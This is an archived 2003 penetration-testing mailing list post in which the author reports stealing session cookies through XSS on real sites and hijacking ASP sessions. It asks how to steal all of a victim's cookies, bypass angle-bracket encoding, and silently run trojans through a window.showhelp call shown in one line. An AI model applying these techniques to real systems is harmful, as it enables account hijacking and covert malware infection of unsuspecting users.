Penetration Testing mailing list archives
RE: Proof of Concept Tool on Web Application Security
From: "Indian Tiger" <indiantiger () mailandnews com>
Date: Wed, 23 Apr 2003 12:50:54 +0530
Hey Everybody, First of all thank you very much to Robert, Rogan, Steve, Nicolas and Leah for their guidance to test XSS and Session ID brute force attack. Now I can transfer victims cookie to another location successfully. I have tested XSS to transfer cookie using following three ways: 1. Using document.location 2. Using Image src 3. Using hidden fields The cookie, which I am getting, is of current application only mean If I am accessing www.hotmail.com I will be getting only Hotmail's session ID asigned to me for that session. Now how can I steal all cookies stored on the victims machine? or how to transfer a file from Victim machine using Client Side Scripting or any other way? Some sites converts < and > tags into < and > to protect them selves from XSS attacks. Is there any way to bypass this protection? I was testing some trojan execution using XSS. In this process I was able to run help file 31users.chm from attackers machine to victims machine as follows: window.showhelp(file:///XXX. XXX. XXX. XXX/c:/windows/help/31users.chm) Is it possible to run some trojan or activex componenet instead of help file? Without alerting for any pop-up. Is this possible to write some malicious help file? (These files not even ask before execution.) As per IDefences Article on Brute forcing Session ID some time session ID is random. I have tested this against six sites and I was not much lucky to get session IDs in which only last 3-4 digits are changing. What do you think in practice still are they so? Since iDEFENSE has published this research in Nov 2001 and current scenario might be a bit changed. In my research of six sites, four sites were using ASP session variable to generated session ID and remaining two their own. I was able to hijack ASP sessions using session IDs. In my testing, first I have logged in as user1, got his session ID and using user1s session ID, I was able to hijack user1. Any help on this would be highly appreciated. Thanking You. Sincerely, Indian Tiger, CISSP --------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-pen-test ----------------------------------------------------------------------------
Current thread:
- Proof of Concept Tool on Web Application Security Indian Tiger (Apr 10)
- Re: Proof of Concept Tool on Web Application Security Jörg Schütter (Apr 27)
- <Possible follow-ups>
- RE: Proof of Concept Tool on Web Application Security Einecker, Leah (Apr 11)
- RE: Proof of Concept Tool on Web Application Security Dawes, Rogan (ZA - Johannesburg) (Apr 11)
- RE: Proof of Concept Tool on Web Application Security Indian Tiger (Apr 14)
- RE: Proof of Concept Tool on Web Application Security Nicolas Gregoire (Apr 14)
- RE: Proof of Concept Tool on Web Application Security Robert Auger (Apr 14)
- Re: Proof of Concept Tool on Web Application Security Jon Pastore (Apr 16)
- RE: Proof of Concept Tool on Web Application Security Dawes, Rogan (ZA - Johannesburg) (Apr 14)
- RE: Proof of Concept Tool on Web Application Security Dawes, Rogan (ZA - Johannesburg) (Apr 16)
- RE: Proof of Concept Tool on Web Application Security Indian Tiger (Apr 24)
- For Indian Tiger - Pen test lab Sam (Apr 27)